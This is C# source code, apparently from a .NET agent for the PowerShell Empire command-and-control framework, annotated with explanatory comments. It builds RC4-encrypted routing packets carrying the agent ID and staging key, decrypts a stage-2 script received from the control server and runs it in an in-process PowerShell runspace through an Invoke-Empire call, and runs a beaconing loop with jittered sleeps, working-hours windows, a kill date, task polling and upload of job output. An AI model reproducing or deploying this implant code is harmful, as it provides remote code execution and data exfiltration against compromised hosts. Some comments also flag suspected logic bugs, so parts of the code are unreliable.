        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        /// <summary>
        /// Builds one "routing packet": a short RC4-wrapped header carrying the agent ID,
        /// a language byte and a meta value, followed by the already-encrypted payload.
        /// The wire layout is spelled out here so that it can be recognised when this
        /// traffic is inspected or parsed by a decoder.
        /// </summary>
        /// <param name="encryptedBytes">Payload appended after the header; may be null or empty.</param>
        /// <param name="meta">Meta value stored as a single header byte; Convert.ToByte throws OverflowException if it does not fit in 0..255.</param>
        /// <returns>IV (4 bytes) || RC4(IV || stagingKey, header) || encryptedBytes.</returns>
        private byte[] NewRoutingPacket(byte[] encryptedBytes, int meta)
        {
            // Length field placed in the header; 0 when there is no payload.
            int encryptedBytesLength = 0;

            if (encryptedBytes != null && encryptedBytes.Length > 0)
            {
                encryptedBytesLength = encryptedBytes.Length;
            }

            // Header = ASCII(agent ID) || [lang, meta, 0x00, 0x00] || length(4 bytes).
            byte[] data = Encoding.ASCII.GetBytes(sessionInfo.GetAgentID());
            byte   lang = 0x03;   // fixed language marker; this code never sends any other value

            data = Misc.combine(data, new byte[4] {
                lang, Convert.ToByte(meta), 0x00, 0x00
            });
            // BitConverter.GetBytes uses the host byte order (little-endian on x86/x64), not a fixed network order.
            data = Misc.combine(data, BitConverter.GetBytes(encryptedBytesLength));

            // The header is RC4-encrypted under (IV || staging key) and the 4-byte IV is sent in
            // clear in front of it. Only the IV varies between packets; the staging key comes from
            // sessionInfo. No MAC or other integrity check is applied to the header here.
            // NewInitializationVector(4) is presumably random — its source is not visible in this file.
            byte[] initializationVector = NewInitializationVector(4);
            byte[] rc4Key            = Misc.combine(initializationVector, sessionInfo.GetStagingKeyBytes());
            byte[] routingPacketData = EmpireStager.rc4Encrypt(rc4Key, data);

            // Final frame: IV || encrypted header || (optional) payload.
            routingPacketData = Misc.combine(initializationVector, routingPacketData);
            if (encryptedBytes != null && encryptedBytes.Length > 0)
            {
                routingPacketData = Misc.combine(routingPacketData, encryptedBytes);
            }

            return(routingPacketData);
        }
        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        /// <summary>
        /// Decrypts the stage-2 response with the session key, treats the plaintext as a
        /// PowerShell script (expected to define Invoke-Empire), and runs it in an in-process
        /// runspace followed by an Invoke-Empire call that passes the first control server,
        /// the staging key, the session key and the agent ID as arguments.
        /// </summary>
        /// <param name="stage2Response">Ciphertext received from the server; decrypted with aesDecrypt under the session key.</param>
        private void PowershellEmpire(byte[] stage2Response)
        {
            // Plaintext is taken as ASCII; whether aesDecrypt verifies integrity is not visible here — TODO confirm.
            string empire    = Encoding.ASCII.GetString(aesDecrypt(sessionInfo.GetSessionKey(), stage2Response));
            string execution = "Invoke-Empire";

            // The invocation line embeds both secrets (staging key and session key) in clear;
            // anything that records this string — the PRINT build below, or PowerShell
            // script-block logging on the host — captures them.
            execution += " -Servers \"" + sessionInfo.GetControlServers().First() + "\"";
            execution += " -StagingKey \"" + sessionInfo.GetStagingKey() + "\"";
            execution += " -SessionKey \"" + sessionInfo.GetSessionKey() + "\"";
            execution += " -SessionID  \"" + sessionInfo.GetAgentID() + "\"";

#if (PRINT)
            // Debug builds only: writes the full command line, including both keys, to stdout.
            Console.WriteLine(execution);
#endif
            // Hosts the PowerShell engine inside this process (System.Management.Automation)
            // rather than starting a separate powershell.exe; the concatenated script is still
            // subject to the engine's own logging/inspection hooks where those are enabled.
            using (Runspace runspace = RunspaceFactory.CreateRunspace())
            {
                runspace.Open();

                using (Pipeline pipeline = runspace.CreatePipeline())
                {
                    // Script definition and the invocation are submitted as one script text.
                    pipeline.Commands.AddScript(empire + ";" + execution + ";");
                    pipeline.Invoke();
                }
            }
        }
        ////////////////////////////////////////////////////////////////////////////////
        // Main Loop
        ////////////////////////////////////////////////////////////////////////////////
        /// <summary>
        /// One iteration of the agent's main loop; the loop that calls this repeatedly is not
        /// visible in this file. In order: kill-date / lost-limit exit check, working-hours
        /// sleep, jittered delay, upload of pending job output, one task poll, forced GC.
        /// </summary>
        private void Run()
        {
            ////////////////////////////////////////////////////////////////////////////////
            // Exit path. Entered when the kill date compares greater than DateTime.Now (i.e. lies
            // after the current local time) or when more check-ins were missed than the lost limit.
            // NOTE(review): the message below says "past killdate"; the comparison direction
            // should be confirmed against the intended semantics.
            if (sessionInfo.GetKillDate().CompareTo(DateTime.Now) > 0 || coms.MissedCheckins > sessionInfo.GetDefaultLostLimit())
            {
                // Flush any pending job packets before leaving.
                jobTracking.CheckAgentJobs(ref packets, ref coms);

                if (packets.Length > 0)
                {
                    coms.SendMessage(packets);
                }

                string message = "";
                if (sessionInfo.GetKillDate().CompareTo(DateTime.Now) > 0)
                {
                    message = "[!] Agent " + sessionInfo.GetAgentID() + " exiting: past killdate";
                }
                else
                {
                    message = "[!] Agent " + sessionInfo.GetAgentID() + " exiting: Lost limit reached";
                }

                // Announce the exit to the server (packet type 2 — presumably a status/exit
                // message; confirm in coms.EncodePacket), then terminate the whole process.
                ushort result = 0;
                coms.SendMessage(coms.EncodePacket(2, message, result));
                Environment.Exit(1);
            }

            ////////////////////////////////////////////////////////////////////////////////
            // Working-hours window. Only evaluated when both bounds are configured.
            if (null != sessionInfo.GetWorkingHoursStart() && null != sessionInfo.GetWorkingHoursEnd())
            {
                DateTime now = DateTime.Now;

                // A window whose end precedes its start is taken to span midnight: move the
                // start back by one day (this mutates sessionInfo, so it persists across calls).
                if ((sessionInfo.GetWorkingHoursEnd() - sessionInfo.GetWorkingHoursStart()).Hours < 0)
                {
                    sessionInfo.SetWorkingHoursStart(sessionInfo.GetWorkingHoursStart().AddDays(-1));
                }

                // Inside the window: compute start - now (negative here, since now > start).
                if (now.CompareTo(sessionInfo.GetWorkingHoursStart()) > 0 &&
                    now.CompareTo(sessionInfo.GetWorkingHoursEnd()) < 0)
                {
                    TimeSpan sleep = sessionInfo.GetWorkingHoursStart().Subtract(now);
                    // NOTE(review): CompareTo(0) boxes an int into TimeSpan.CompareTo(object), which
                    // only accepts a TimeSpan; the observed behaviour here should be verified at runtime.
                    if (sleep.CompareTo(0) < 0)
                    {
                        sleep = (sessionInfo.GetWorkingHoursStart().AddDays(1) - now);
                    }
                    Thread.Sleep((int)sleep.TotalMilliseconds);
                }
            }

            ////////////////////////////////////////////////////////////////////////////////
            // Jittered delay: sleep a random number of seconds in [delay*(jitter-1), delay*(jitter+1)).
            if (0 != sessionInfo.GetDefaultDelay())
            {
                int max = (int)((sessionInfo.GetDefaultJitter() + 1) * sessionInfo.GetDefaultDelay());
                // max is already an int, so this comparison can never be true.
                if (max > int.MaxValue)
                {
                    max = int.MaxValue - 1;
                }

                int min = (int)((sessionInfo.GetDefaultJitter() - 1) * sessionInfo.GetDefaultDelay());
                if (min < 0)
                {
                    min = 0;
                }

                int sleepTime;
                if (min == max)
                {
                    sleepTime = min;
                }
                else
                {
                    // A fresh System.Random per call; the upper bound of Next is exclusive.
                    Random random = new Random();
                    sleepTime = random.Next(min, max);
                }

                // Seconds to milliseconds; the multiplication is unchecked int arithmetic.
                Thread.Sleep(sleepTime * 1000);
            }

            ////////////////////////////////////////////////////////////////////////////////
            // Upload any job output that has accumulated since the last call.
            byte[] jobResults = jobTracking.GetAgentJobsOutput(ref coms);
            if (0 < jobResults.Length)
            {
                coms.SendMessage(jobResults);
            }

            ////////////////////////////////////////////////////////////////////////////////
            // Poll for tasking. Any non-empty response resets the missed-checkin counter.
            byte[] taskData = coms.GetTask();
            if (taskData.Length > 0)
            {
                coms.MissedCheckins = 0;
                // The string check is effectively redundant with the length check above,
                // since decoding a non-empty byte array does not yield an empty string.
                if (String.Empty != Encoding.UTF8.GetString(taskData))
                {
                    coms.DecodeRoutingPacket(taskData, ref jobTracking);
                }
            }
            // Forced full collection on every iteration.
            GC.Collect();
        }